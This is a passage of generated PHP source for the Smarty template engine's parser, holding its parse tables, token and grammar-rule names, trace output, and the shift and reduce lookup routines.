         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(24, 26, 32, 37, 38, 39, 54, 55, 56, 57, ),
         array(26, 32, 37, 38, 39, 54, 55, 56, 57, ),
         array(26, 32, 37, 38, 39, 54, 55, 56, 57, ),
         array(14, 16, 48, 50, 53, ),
         array(3, 9, 10, 11, 12, 14, 18, 19, 20, 25, 29, 30, 31, 59, 60, ),
         array(1, 13, 17, 26, 32, 35, 47, ),
         array(14, 16, 50, 53, ),
         array(1, 26, 32, ),
         array(14, 35, 53, ),
         array(3, 9, 10, 11, 12, 14, 18, 19, 20, 25, 29, 30, 31, 59, 60, ),
         array(36, 37, 38, 39, 54, 55, 56, 57, ),
         array(37, 38, 39, 52, 54, 55, 56, 57, ),
         array(36, 37, 38, 39, 54, 55, 56, 57, ),
         array(13, 37, 38, 39, 54, 55, 56, 57, ),
         array(13, 37, 38, 39, 54, 55, 56, 57, ),
         array(13, 37, 38, 39, 54, 55, 56, 57, ),
         array(27, 37, 38, 39, 54, 55, 56, 57, ),
         array(13, 37, 38, 39, 54, 55, 56, 57, ),
         array(13, 37, 38, 39, 54, 55, 56, 57, ),
         array(2, 37, 38, 39, 54, 55, 56, 57, ),
         array(21, 37, 38, 39, 54, 55, 56, 57, ),
         array(37, 38, 39, 54, 55, 56, 57, 60, ),
         array(37, 38, 39, 54, 55, 56, 57, ),
         array(37, 38, 39, 54, 55, 56, 57, ),
         array(37, 38, 39, 54, 55, 56, 57, ),
         array(37, 38, 39, 54, 55, 56, 57, ),
         array(37, 38, 39, 54, 55, 56, 57, ),
         array(37, 38, 39, 54, 55, 56, 57, ),
         array(37, 38, 39, 54, 55, 56, 57, ),
         array(37, 38, 39, 54, 55, 56, 57, ),
         array(37, 38, 39, 54, 55, 56, 57, ),
         array(37, 38, 39, 54, 55, 56, 57, ),
         array(37, 38, 39, 54, 55, 56, 57, ),
         array(37, 38, 39, 54, 55, 56, 57, ),
         array(37, 38, 39, 54, 55, 56, 57, ),
         array(37, 38, 39, 54, 55, 56, 57, ),
         array(37, 38, 39, 54, 55, 56, 57, ),
         array(9, 12, 16, 26, 28, 32, ),
         array(9, 12, 16, 26, 32, ),
         array(17, 44, 51, ),
         array(1, 26, 32, ),
         array(1, 26, 32, ),
         array(15, 17, 47, ),
         array(14, 35, 53, ),
         array(14, 35, 53, ),
         array(1, 2, ),
         array(3, 4, 5, 6, 9, 10, 11, 12, 18, 19, 20, 25, 29, 30, 31, ),
         array(2, 9, 12, 15, 16, 17, 44, 47, 49, 51, ),
         array(12, 14, 16, 53, ),
         array(9, 12, 16, 49, ),
         array(1, 13, 26, 32, ),
         array(1, 13, 26, 32, ),
         array(1, 13, 26, 32, ),
         array(15, 17, 47, ),
         array(9, 12, 16, ),
         array(9, 12, 16, ),
         array(14, 16, ),
         array(17, 47, ),
         array(1, 28, ),
         array(26, 32, ),
         array(14, 16, ),
         array(26, 32, ),
         array(26, 32, ),
         array(1, 52, ),
         array(14, 53, ),
         array(1, 17, ),
         array(26, 32, ),
         array(1, ),
         array(1, ),
         array(1, ),
         array(1, ),
         array(17, ),
         array(1, ),
         array(1, ),
         array(1, ),
         array(1, ),
         array(17, ),
         array(1, ),
         array(1, ),
         array(),
         array(),
         array(2, 9, 12, 16, 17, 44, 47, 49, 51, 52, ),
         array(2, 9, 12, 15, 16, 17, 44, 47, 49, 51, ),
         array(2, 9, 12, 16, 17, 44, 47, 49, 51, ),
         array(2, 9, 12, 16, 17, 44, 47, 49, 51, ),
         array(9, 12, 16, 17, 44, 47, 49, 51, ),
         array(12, 14, 16, 33, 53, ),
         array(9, 12, 16, 49, ),
         array(9, 12, 16, ),
         array(15, 44, 51, ),
         array(14, 53, ),
         array(26, 32, ),
         array(44, 51, ),
         array(26, 32, ),
         array(44, 51, ),
         array(44, 51, ),
         array(44, 51, ),
         array(44, 51, ),
         array(26, 32, ),
         array(26, 32, ),
         array(26, 32, ),
         array(44, 51, ),
         array(26, 32, ),
         array(26, 32, ),
         array(44, 51, ),
         array(26, 32, ),
         array(15, 22, ),
         array(26, 32, ),
         array(26, 32, ),
         array(26, 32, ),
         array(44, 51, ),
         array(44, 51, ),
         array(26, 32, ),
         array(44, 51, ),
         array(12, 35, ),
         array(26, 32, ),
         array(14, 53, ),
         array(1, ),
         array(17, ),
         array(2, ),
         array(17, ),
         array(2, ),
         array(17, ),
         array(1, ),
         array(1, ),
         array(35, ),
         array(1, ),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(2, 35, 37, 38, 39, 47, 54, 55, 56, 57, ),
         array(13, 21, 23, 26, 32, 34, 36, 44, ),
         array(13, 15, 26, 32, 35, 47, ),
         array(13, 22, 26, 32, 45, ),
         array(13, 22, 26, 32, 45, ),
         array(35, 44, 47, 52, ),
         array(9, 12, 16, 49, ),
         array(22, 45, 52, ),
         array(28, 35, 47, ),
         array(22, 45, 60, ),
         array(35, 47, ),
         array(21, 34, ),
         array(34, 36, ),
         array(16, 49, ),
         array(6, 8, ),
         array(44, 52, ),
         array(7, 8, ),
         array(34, 52, ),
         array(35, 47, ),
         array(35, 47, ),
         array(22, 45, ),
         array(34, 36, ),
         array(15, 44, ),
         array(34, 36, ),
         array(34, 36, ),
         array(13, ),
         array(16, ),
         array(50, ),
         array(7, ),
         array(16, ),
         array(52, ),
         array(23, ),
         array(36, ),
         array(50, ),
         array(14, ),
         array(13, ),
         array(52, ),
         array(15, ),
         array(16, ),
         array(40, ),
         array(16, ),
         array(35, ),
         array(16, ),
         array(33, ),
         array(16, ),
         array(33, ),
         array(35, ),
         array(44, ),
         array(16, ),
         array(16, ),
         array(16, ),
         array(16, ),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
         array(),
);
    public static $yy_default = array(
    336,  512,  512,  512,  497,  497,  512,  474,  474,  474,
    512,  512,  512,  512,  512,  512,  512,  512,  512,  512,
    512,  512,  512,  512,  512,  512,  512,  512,  512,  512,
    512,  512,  512,  512,  512,  512,  512,  512,  512,  512,
    512,  512,  512,  512,  512,  512,  377,  377,  356,  512,
    512,  413,  512,  377,  512,  512,  512,  512,  512,  512,
    512,  512,  382,  512,  349,  512,  512,  512,  382,  379,
    389,  388,  384,  402,  473,  397,  498,  500,  401,  361,
    472,  499,  349,  377,  377,  487,  377,  377,  429,  512,
    512,  368,  326,  428,  512,  439,  391,  391,  391,  429,
    439,  439,  512,  429,  391,  377,  512,  377,  377,  391,
    512,  371,  358,  395,  394,  396,  373,  429,  400,  404,
    391,  404,  484,  406,  405,  481,  334,  428,  428,  428,
    428,  428,  512,  441,  439,  455,  512,  363,  435,  354,
    434,  437,  433,  432,  359,  357,  364,  436,  353,  367,
    466,  365,  512,  352,  350,  360,  467,  465,  346,  464,
    439,  366,  512,  369,  461,  475,  488,  476,  485,  372,
    422,  439,  374,  480,  439,  480,  480,  439,  334,  413,
    409,  413,  403,  403,  413,  440,  403,  413,  403,  413,
    512,  512,  512,  332,  409,  512,  512,  512,  423,  403,
    512,  409,  512,  512,  512,  512,  512,  512,  512,  418,
    385,  512,  512,  512,  512,  512,  512,  512,  415,  512,
    455,  512,  512,  512,  411,  486,  409,  512,  512,  512,
    512,  419,  407,  362,  445,  418,  425,  424,  420,  339,
    460,  421,  483,  398,  416,  340,  399,  455,  378,  337,
    338,  330,  328,  329,  442,  443,  444,  438,  392,  393,
    427,  426,  386,  417,  408,  390,  410,  331,  333,  335,
    412,  470,  414,  415,  503,  478,  495,  471,  459,  458,
    375,  457,  344,  462,  508,  493,  376,  496,  456,  509,
    494,  501,  504,  511,  510,  507,  505,  502,  506,  345,
    468,  469,  446,  355,  341,  452,  450,  454,  448,  453,
    447,  489,  490,  491,  463,  449,  492,  451,  327,  342,
    343,  370,  430,  431,  479,  477,
);
    const YYNOCODE = 109;
    const YYSTACKDEPTH = 500;
    const YYNSTATE = 326;
    const YYNRULE = 186;
    const YYERRORSYMBOL = 61;
    const YYERRSYMDT = 'yy0';
    const YYFALLBACK = 0;
    public static $yyFallback = array(
    );
    public function Trace($TraceFILE, $zTracePrompt)
    {
        if (!$TraceFILE) {
            $zTracePrompt = 0;
        } elseif (!$zTracePrompt) {
            $TraceFILE = 0;
        }
        $this->yyTraceFILE = $TraceFILE;
        $this->yyTracePrompt = $zTracePrompt;
    }

    public function PrintTrace()
    {
        $this->yyTraceFILE = fopen('php://output', 'w');
        $this->yyTracePrompt = '<br>';
    }

    public $yyTraceFILE;
    public $yyTracePrompt;
    public $yyidx;                    /* Index of top element in stack */
    public $yyerrcnt;                 /* Shifts left before out of the error */
    public $yystack = array();  /* The parser's stack */

    public $yyTokenName = array(
  '$',             'VERT',          'COLON',         'TEXT',        
  'STRIPON',       'STRIPOFF',      'LITERALSTART',  'LITERALEND',  
  'LITERAL',       'SIMPELOUTPUT',  'SIMPLETAG',     'SMARTYBLOCKCHILDPARENT',
  'LDEL',          'RDEL',          'DOLLARID',      'EQUAL',       
  'ID',            'PTR',           'LDELMAKENOCACHE',  'LDELIF',      
  'LDELFOR',       'SEMICOLON',     'INCDEC',        'TO',          
  'STEP',          'LDELFOREACH',   'SPACE',         'AS',          
  'APTR',          'LDELSETFILTER',  'CLOSETAG',      'LDELSLASH',   
  'ATTR',          'INTEGER',       'COMMA',         'OPENP',       
  'CLOSEP',        'MATH',          'UNIMATH',       'ISIN',        
  'QMARK',         'NOT',           'TYPECAST',      'HEX',         
  'DOT',           'INSTANCEOF',    'SINGLEQUOTESTRING',  'DOUBLECOLON', 
  'NAMESPACE',     'AT',            'HATCH',         'OPENB',       
  'CLOSEB',        'DOLLAR',        'LOGOP',         'SLOGOP',      
  'TLOGOP',        'SINGLECOND',    'ARRAYOPEN',     'QUOTE',       
  'BACKTICK',      'error',         'start',         'template',    
  'literal_e2',    'literal_e1',    'smartytag',     'tagbody',     
  'tag',           'outattr',       'eqoutattr',     'varindexed',  
  'output',        'attributes',    'variable',      'value',       
  'expr',          'modifierlist',  'statement',     'statements',  
  'foraction',     'varvar',        'modparameters',  'attribute',   
  'ternary',       'tlop',          'lop',           'scond',       
  'array',         'function',      'ns1',           'doublequoted_with_quotes',
  'static_class_access',  'arraydef',      'object',        'arrayindex',  
  'indexdef',      'varvarele',     'objectchain',   'objectelement',
  'method',        'params',        'modifier',      'modparameter',
  'arrayelements',  'arrayelement',  'doublequoted',  'doublequotedcontent',
    );

    public static $yyRuleName = array(
  'start ::= template',
  'template ::= template TEXT',
  'template ::= template STRIPON',
  'template ::= template STRIPOFF',
  'template ::= template LITERALSTART literal_e2 LITERALEND',
  'literal_e2 ::= literal_e1 LITERALSTART literal_e1 LITERALEND',
  'literal_e2 ::= literal_e1',
  'literal_e1 ::= literal_e1 LITERAL',
  'literal_e1 ::=',
  'template ::= template smartytag',
  'template ::=',
  'smartytag ::= SIMPELOUTPUT',
  'smartytag ::= SIMPLETAG',
  'smartytag ::= SMARTYBLOCKCHILDPARENT',
  'smartytag ::= LDEL tagbody RDEL',
  'smartytag ::= tag RDEL',
  'tagbody ::= outattr',
  'tagbody ::= DOLLARID eqoutattr',
  'tagbody ::= varindexed eqoutattr',
  'eqoutattr ::= EQUAL outattr',
  'outattr ::= output attributes',
  'output ::= variable',
  'output ::= value',
  'output ::= expr',
  'tag ::= LDEL ID attributes',
  'tag ::= LDEL ID',
  'tag ::= LDEL ID modifierlist attributes',
  'tag ::= LDEL ID PTR ID attributes',
  'tag ::= LDEL ID PTR ID modifierlist attributes',
  'tag ::= LDELMAKENOCACHE DOLLARID',
  'tag ::= LDELIF expr',
  'tag ::= LDELIF expr attributes',
  'tag ::= LDELIF statement',
  'tag ::= LDELIF statement attributes',
  'tag ::= LDELFOR statements SEMICOLON expr SEMICOLON varindexed foraction attributes',
  'foraction ::= EQUAL expr',
  'foraction ::= INCDEC',
  'tag ::= LDELFOR statement TO expr attributes',
  'tag ::= LDELFOR statement TO expr STEP expr attributes',
  'tag ::= LDELFOREACH SPACE expr AS varvar attributes',
  'tag ::= LDELFOREACH SPACE expr AS varvar APTR varvar attributes',
  'tag ::= LDELFOREACH attributes',
  'tag ::= LDELSETFILTER ID modparameters',
  'tag ::= LDELSETFILTER ID modparameters modifierlist',
  'smartytag ::= CLOSETAG',
  'tag ::= LDELSLASH ID',
  'tag ::= LDELSLASH ID modifierlist',
  'tag ::= LDELSLASH ID PTR ID',
  'tag ::= LDELSLASH ID PTR ID modifierlist',
  'attributes ::= attributes attribute',
  'attributes ::= attribute',
  'attributes ::=',
  'attribute ::= SPACE ID EQUAL ID',
  'attribute ::= ATTR expr',
  'attribute ::= ATTR value',
  'attribute ::= SPACE ID',
  'attribute ::= SPACE expr',
  'attribute ::= SPACE value',
  'attribute ::= SPACE INTEGER EQUAL expr',
  'statements ::= statement',
  'statements ::= statements COMMA statement',
  'statement ::= DOLLARID EQUAL INTEGER',
  'statement ::= DOLLARID EQUAL expr',
  'statement ::= varindexed EQUAL expr',
  'statement ::= OPENP statement CLOSEP',
  'expr ::= value',
  'expr ::= ternary',
  'expr ::= DOLLARID COLON ID',
  'expr ::= expr MATH value',
  'expr ::= expr UNIMATH value',
  'expr ::= expr tlop value',
  'expr ::= expr lop expr',
  'expr ::= expr scond',
  'expr ::= expr ISIN array',
  'expr ::= expr ISIN value',
  'ternary ::= OPENP expr CLOSEP QMARK DOLLARID COLON expr',
  'ternary ::= OPENP expr CLOSEP QMARK expr COLON expr',
  'value ::= variable',
  'value ::= UNIMATH value',
  'value ::= NOT value',
  'value ::= TYPECAST value',
  'value ::= variable INCDEC',
  'value ::= HEX',
  'value ::= INTEGER',
  'value ::= INTEGER DOT INTEGER',
  'value ::= INTEGER DOT',
  'value ::= DOT INTEGER',
  'value ::= ID',
  'value ::= function',
  'value ::= OPENP expr CLOSEP',
  'value ::= variable INSTANCEOF ns1',
  'value ::= variable INSTANCEOF variable',
  'value ::= SINGLEQUOTESTRING',
  'value ::= doublequoted_with_quotes',
  'value ::= varindexed DOUBLECOLON static_class_access',
  'value ::= smartytag',
  'value ::= value modifierlist',
  'value ::= NAMESPACE',
  'value ::= arraydef',
  'value ::= ns1 DOUBLECOLON static_class_access',
  'ns1 ::= ID',
  'ns1 ::= NAMESPACE',
  'variable ::= DOLLARID',
  'variable ::= varindexed',
  'variable ::= varvar AT ID',
  'variable ::= object',
  'variable ::= HATCH ID HATCH',
  'variable ::= HATCH ID HATCH arrayindex',
  'variable ::= HATCH variable HATCH',
  'variable ::= HATCH variable HATCH arrayindex',
  'varindexed ::= DOLLARID arrayindex',
  'varindexed ::= varvar arrayindex',
  'arrayindex ::= arrayindex indexdef',
  'arrayindex ::=',
  'indexdef ::= DOT DOLLARID',
  'indexdef ::= DOT varvar',
  'indexdef ::= DOT varvar AT ID',
  'indexdef ::= DOT ID',
  'indexdef ::= DOT INTEGER',
  'indexdef ::= DOT LDEL expr RDEL',
  'indexdef ::= OPENB ID CLOSEB',
  'indexdef ::= OPENB ID DOT ID CLOSEB',
  'indexdef ::= OPENB SINGLEQUOTESTRING CLOSEB',
  'indexdef ::= OPENB INTEGER CLOSEB',
  'indexdef ::= OPENB DOLLARID CLOSEB',
  'indexdef ::= OPENB variable CLOSEB',
  'indexdef ::= OPENB value CLOSEB',
  'indexdef ::= OPENB expr CLOSEB',
  'indexdef ::= OPENB CLOSEB',
  'varvar ::= DOLLARID',
  'varvar ::= DOLLAR',
  'varvar ::= varvar varvarele',
  'varvarele ::= ID',
  'varvarele ::= SIMPELOUTPUT',
  'varvarele ::= LDEL expr RDEL',
  'object ::= varindexed objectchain',
  'objectchain ::= objectelement',
  'objectchain ::= objectchain objectelement',
  'objectelement ::= PTR ID arrayindex',
  'objectelement ::= PTR varvar arrayindex',
  'objectelement ::= PTR LDEL expr RDEL arrayindex',
  'objectelement ::= PTR ID LDEL expr RDEL arrayindex',
  'objectelement ::= PTR method',
  'function ::= ns1 OPENP params CLOSEP',
  'method ::= ID OPENP params CLOSEP',
  'method ::= DOLLARID OPENP params CLOSEP',
  'params ::= params COMMA expr',
  'params ::= expr',
  'params ::=',
  'modifierlist ::= modifierlist modifier modparameters',
  'modifierlist ::= modifier modparameters',
  'modifier ::= VERT AT ID',
  'modifier ::= VERT ID',
  'modparameters ::= modparameters modparameter',
  'modparameters ::=',
  'modparameter ::= COLON value',
  'modparameter ::= COLON UNIMATH value',
  'modparameter ::= COLON array',
  'static_class_access ::= method',
  'static_class_access ::= method objectchain',
  'static_class_access ::= ID',
  'static_class_access ::= DOLLARID arrayindex',
  'static_class_access ::= DOLLARID arrayindex objectchain',
  'lop ::= LOGOP',
  'lop ::= SLOGOP',
  'tlop ::= TLOGOP',
  'scond ::= SINGLECOND',
  'arraydef ::= OPENB arrayelements CLOSEB',
  'arraydef ::= ARRAYOPEN arrayelements CLOSEP',
  'arrayelements ::= arrayelement',
  'arrayelements ::= arrayelements COMMA arrayelement',
  'arrayelements ::=',
  'arrayelement ::= value APTR expr',
  'arrayelement ::= ID APTR expr',
  'arrayelement ::= expr',
  'doublequoted_with_quotes ::= QUOTE QUOTE',
  'doublequoted_with_quotes ::= QUOTE doublequoted QUOTE',
  'doublequoted ::= doublequoted doublequotedcontent',
  'doublequoted ::= doublequotedcontent',
  'doublequotedcontent ::= BACKTICK variable BACKTICK',
  'doublequotedcontent ::= BACKTICK expr BACKTICK',
  'doublequotedcontent ::= DOLLARID',
  'doublequotedcontent ::= LDEL variable RDEL',
  'doublequotedcontent ::= LDEL expr RDEL',
  'doublequotedcontent ::= smartytag',
  'doublequotedcontent ::= TEXT',
    );

    public function tokenName($tokenType)
    {
        if ($tokenType === 0) {
            return 'End of Input';
        }
        if ($tokenType > 0 && $tokenType < count($this->yyTokenName)) {
            return $this->yyTokenName[$tokenType];
        } else {
            return 'Unknown';
        }
    }

    public static function yy_destructor($yymajor, $yypminor)
    {
        switch ($yymajor) {
            default:  break;   /* If no destructor action specified: do nothing */
        }
    }

    public function yy_pop_parser_stack()
    {
        if (empty($this->yystack)) {
            return;
        }
        $yytos = array_pop($this->yystack);
        if ($this->yyTraceFILE && $this->yyidx >= 0) {
            fwrite($this->yyTraceFILE,
                $this->yyTracePrompt . 'Popping ' . $this->yyTokenName[$yytos->major] .
                    "\n");
        }
        $yymajor = $yytos->major;
        self::yy_destructor($yymajor, $yytos->minor);
        $this->yyidx--;

        return $yymajor;
    }

    public function __destruct()
    {
        while ($this->yystack !== Array()) {
            $this->yy_pop_parser_stack();
        }
        if (is_resource($this->yyTraceFILE)) {
            fclose($this->yyTraceFILE);
        }
    }

    public function yy_get_expected_tokens($token)
    {
        static $res3 = array();
        static $res4 = array();
        $state = $this->yystack[$this->yyidx]->stateno;
        $expected = self::$yyExpectedTokens[$state];
        if (isset($res3[$state][$token])) {
            if ($res3[$state][$token]) {
                return $expected;
            }
        } else {
            if ($res3[$state][$token] = in_array($token, self::$yyExpectedTokens[$state], true)) {
                return $expected;
            }
        }
        $stack = $this->yystack;
        $yyidx = $this->yyidx;
        do {
            $yyact = $this->yy_find_shift_action($token);
            if ($yyact >= self::YYNSTATE && $yyact < self::YYNSTATE + self::YYNRULE) {
                // reduce action
                $done = 0;
                do {
                    if ($done++ === 100) {
                        $this->yyidx = $yyidx;
                        $this->yystack = $stack;
                        // too much recursion prevents proper detection
                        // so give up
                        return array_unique($expected);
                    }
                    $yyruleno = $yyact - self::YYNSTATE;
                    $this->yyidx -= self::$yyRuleInfo[$yyruleno][1];
                    $nextstate = $this->yy_find_reduce_action(
                        $this->yystack[$this->yyidx]->stateno,
                        self::$yyRuleInfo[$yyruleno][0]);
                    if (isset(self::$yyExpectedTokens[$nextstate])) {
                $expected = array_merge($expected, self::$yyExpectedTokens[$nextstate]);
                        if (isset($res4[$nextstate][$token])) {
                            if ($res4[$nextstate][$token]) {
                                $this->yyidx = $yyidx;
                                $this->yystack = $stack;
                                return array_unique($expected);
                            }
                        } else {
                            if ($res4[$nextstate][$token] = in_array($token, self::$yyExpectedTokens[$nextstate], true)) {
                                $this->yyidx = $yyidx;
                                $this->yystack = $stack;
                                return array_unique($expected);
                            }
                        }
                    }
                    if ($nextstate < self::YYNSTATE) {
                        // we need to shift a non-terminal
                        $this->yyidx++;
                        $x = new TP_yyStackEntry;
                        $x->stateno = $nextstate;
                        $x->major = self::$yyRuleInfo[$yyruleno][0];
                        $this->yystack[$this->yyidx] = $x;
                        continue 2;
                    } elseif ($nextstate === self::YYNSTATE + self::YYNRULE + 1) {
                        $this->yyidx = $yyidx;
                        $this->yystack = $stack;
                        // the last token was just ignored, we can't accept
                        // by ignoring input, this is in essence ignoring a
                        // syntax error!
                        return array_unique($expected);
                    } elseif ($nextstate === self::YY_NO_ACTION) {
                        $this->yyidx = $yyidx;
                        $this->yystack = $stack;
                        // input accepted, but not shifted (I guess)
                        return $expected;
                    } else {
                        $yyact = $nextstate;
                    }
                } while (true);
            }
            break;
        } while (true);
    $this->yyidx = $yyidx;
    $this->yystack = $stack;

        return array_unique($expected);
    }

    public function yy_is_expected_token($token)
    {
        static $res = array();
        static $res2 = array();
        if ($token === 0) {
            return true; // 0 is not part of this
        }
        $state = $this->yystack[$this->yyidx]->stateno;
        if (isset($res[$state][$token])) {
            if ($res[$state][$token]) {
                return true;
            }
        } else {
            if ($res[$state][$token] = in_array($token, self::$yyExpectedTokens[$state], true)) {
                return true;
            }
       }
        $stack = $this->yystack;
        $yyidx = $this->yyidx;
        do {
            $yyact = $this->yy_find_shift_action($token);
            if ($yyact >= self::YYNSTATE && $yyact < self::YYNSTATE + self::YYNRULE) {
                // reduce action
                $done = 0;
                do {
                    if ($done++ === 100) {
                        $this->yyidx = $yyidx;
                        $this->yystack = $stack;
                        // too much recursion prevents proper detection
                        // so give up
                        return true;
                    }
                    $yyruleno = $yyact - self::YYNSTATE;
                    $this->yyidx -= self::$yyRuleInfo[$yyruleno][1];
                    $nextstate = $this->yy_find_reduce_action(
                        $this->yystack[$this->yyidx]->stateno,
                        self::$yyRuleInfo[$yyruleno][0]);
                    if (isset($res2[$nextstate][$token])) {
                        if ($res2[$nextstate][$token]) {
                            $this->yyidx = $yyidx;
                            $this->yystack = $stack;
                            return true;
                        }
                    } else {
                        if ($res2[$nextstate][$token] = (isset(self::$yyExpectedTokens[$nextstate]) && in_array($token, self::$yyExpectedTokens[$nextstate], true))) {
                            $this->yyidx = $yyidx;
                            $this->yystack = $stack;
                            return true;
                        }
                    }
                    if ($nextstate < self::YYNSTATE) {
                        // we need to shift a non-terminal
                        $this->yyidx++;
                        $x = new TP_yyStackEntry;
                        $x->stateno = $nextstate;
                        $x->major = self::$yyRuleInfo[$yyruleno][0];
                        $this->yystack[$this->yyidx] = $x;
                        continue 2;
                    } elseif ($nextstate === self::YYNSTATE + self::YYNRULE + 1) {
                        $this->yyidx = $yyidx;
                        $this->yystack = $stack;
                        if (!$token) {
                            // end of input: this is valid
                            return true;
                        }
                        // the last token was just ignored, we can't accept
                        // by ignoring input, this is in essence ignoring a
                        // syntax error!
                        return false;
                    } elseif ($nextstate === self::YY_NO_ACTION) {
                        $this->yyidx = $yyidx;
                        $this->yystack = $stack;
                        // input accepted, but not shifted (I guess)
                        return true;
                    } else {
                        $yyact = $nextstate;
                    }
                } while (true);
            }
            break;
        } while (true);
        $this->yyidx = $yyidx;
        $this->yystack = $stack;

        return true;
    }

   public function yy_find_shift_action($iLookAhead)
    {
        $stateno = $this->yystack[$this->yyidx]->stateno;

        /* if ($this->yyidx < 0) return self::YY_NO_ACTION;  */
        if (!isset(self::$yy_shift_ofst[$stateno])) {
            // no shift actions
            return self::$yy_default[$stateno];
        }
        $i = self::$yy_shift_ofst[$stateno];
        if ($i === self::YY_SHIFT_USE_DFLT) {
            return self::$yy_default[$stateno];
        }
        if ($iLookAhead === self::YYNOCODE) {
            return self::YY_NO_ACTION;
        }
        $i += $iLookAhead;
        if ($i < 0 || $i >= self::YY_SZ_ACTTAB ||
              self::$yy_lookahead[$i] != $iLookAhead) {
            if (count(self::$yyFallback) && $iLookAhead < count(self::$yyFallback)
                   && ($iFallback = self::$yyFallback[$iLookAhead]) != 0) {
                if ($this->yyTraceFILE) {
                    fwrite($this->yyTraceFILE, $this->yyTracePrompt . 'FALLBACK ' .
                        $this->yyTokenName[$iLookAhead] . ' => ' .
                        $this->yyTokenName[$iFallback] . "\n");
                }

                return $this->yy_find_shift_action($iFallback);
            }

            return self::$yy_default[$stateno];
        } else {
            return self::$yy_action[$i];
        }
    }

    public function yy_find_reduce_action($stateno, $iLookAhead)
    {
        /* $stateno = $this->yystack[$this->yyidx]->stateno; */

        if (!isset(self::$yy_reduce_ofst[$stateno])) {
            return self::$yy_default[$stateno];
        }
        $i = self::$yy_reduce_ofst[$stateno];
        if ($i === self::YY_REDUCE_USE_DFLT) {
            return self::$yy_default[$stateno];
        }
        if ($iLookAhead === self::YYNOCODE) {
            return self::YY_NO_ACTION;
        }
        $i += $iLookAhead;
        if ($i < 0 || $i >= self::YY_SZ_ACTTAB ||
              self::$yy_lookahead[$i] != $iLookAhead) {
            return self::$yy_default[$stateno];
        } else {
            return self::$yy_action[$i];
        }
    }

    public function yy_shift($yyNewState, $yyMajor, $yypMinor)
    {
        $this->yyidx++;
        if ($this->yyidx >= self::YYSTACKDEPTH) {
            $this->yyidx--;
            if ($this->yyTraceFILE) {
                fprintf($this->yyTraceFILE, "%sStack Overflow!\n", $this->yyTracePrompt);
            }
            while ($this->yyidx >= 0) {
                $this->yy_pop_parser_stack();
            }
// line 220 "../smarty/lexer/smarty_internal_templateparser.y"

    $this->internalError = true;
    $this->compiler->trigger_template_error('Stack overflow in template parser');

            return;
        }
        $yytos = new TP_yyStackEntry;
        $yytos->stateno = $yyNewState;
        $yytos->major = $yyMajor;
        $yytos->minor = $yypMinor;
        $this->yystack[] = $yytos;
        if ($this->yyTraceFILE && $this->yyidx > 0) {
            fprintf($this->yyTraceFILE, "%sShift %d\n", $this->yyTracePrompt,
                $yyNewState);
            fprintf($this->yyTraceFILE, "%sStack:", $this->yyTracePrompt);
            for ($i = 1; $i <= $this->yyidx; $i++) {
                fprintf($this->yyTraceFILE, " %s",
                    $this->yyTokenName[$this->yystack[$i]->major]);
            }
            fwrite($this->yyTraceFILE,"\n");
        }
    }

    public static $yyRuleInfo = array(
  array( 0 => 62, 1 => 1 ),
  array( 0 => 63, 1 => 2 ),
  array( 0 => 63, 1 => 2 ),
  array( 0 => 63, 1 => 2 ),
  array( 0 => 63, 1 => 4 ),
  array( 0 => 64, 1 => 4 ),
  array( 0 => 64, 1 => 1 ),
  array( 0 => 65, 1 => 2 ),
  array( 0 => 65, 1 => 0 ),
  array( 0 => 63, 1 => 2 ),
  array( 0 => 63, 1 => 0 ),
  array( 0 => 66, 1 => 1 ),
  array( 0 => 66, 1 => 1 ),
  array( 0 => 66, 1 => 1 ),
  array( 0 => 66, 1 => 3 ),
  array( 0 => 66, 1 => 2 ),
  array( 0 => 67, 1 => 1 ),
  array( 0 => 67, 1 => 2 ),
  array( 0 => 67, 1 => 2 ),
  array( 0 => 70, 1 => 2 ),
  array( 0 => 69, 1 => 2 ),
  array( 0 => 72, 1 => 1 ),
  array( 0 => 72, 1 => 1 ),
  array( 0 => 72, 1 => 1 ),
  array( 0 => 68, 1 => 3 ),
  array( 0 => 68, 1 => 2 ),
  array( 0 => 68, 1 => 4 ),
  array( 0 => 68, 1 => 5 ),
  array( 0 => 68, 1 => 6 ),
  array( 0 => 68, 1 => 2 ),
  array( 0 => 68, 1 => 2 ),
  array( 0 => 68, 1 => 3 ),
  array( 0 => 68, 1 => 2 ),
  array( 0 => 68, 1 => 3 ),
  array( 0 => 68, 1 => 8 ),
  array( 0 => 80, 1 => 2 ),
  array( 0 => 80, 1 => 1 ),
  array( 0 => 68, 1 => 5 ),
  array( 0 => 68, 1 => 7 ),
  array( 0 => 68, 1 => 6 ),
  array( 0 => 68, 1 => 8 ),
  array( 0 => 68, 1 => 2 ),
  array( 0 => 68, 1 => 3 ),
  array( 0 => 68, 1 => 4 ),
  array( 0 => 66, 1 => 1 ),
  array( 0 => 68, 1 => 2 ),
  array( 0 => 68, 1 => 3 ),
  array( 0 => 68, 1 => 4 ),
  array( 0 => 68, 1 => 5 ),
  array( 0 => 73, 1 => 2 ),
  array( 0 => 73, 1 => 1 ),
  array( 0 => 73, 1 => 0 ),
  array( 0 => 83, 1 => 4 ),
  array( 0 => 83, 1 => 2 ),
  array( 0 => 83, 1 => 2 ),
  array( 0 => 83, 1 => 2 ),
  array( 0 => 83, 1 => 2 ),
  array( 0 => 83, 1 => 2 ),
  array( 0 => 83, 1 => 4 ),
  array( 0 => 79, 1 => 1 ),
  array( 0 => 79, 1 => 3 ),
  array( 0 => 78, 1 => 3 ),
  array( 0 => 78, 1 => 3 ),
  array( 0 => 78, 1 => 3 ),
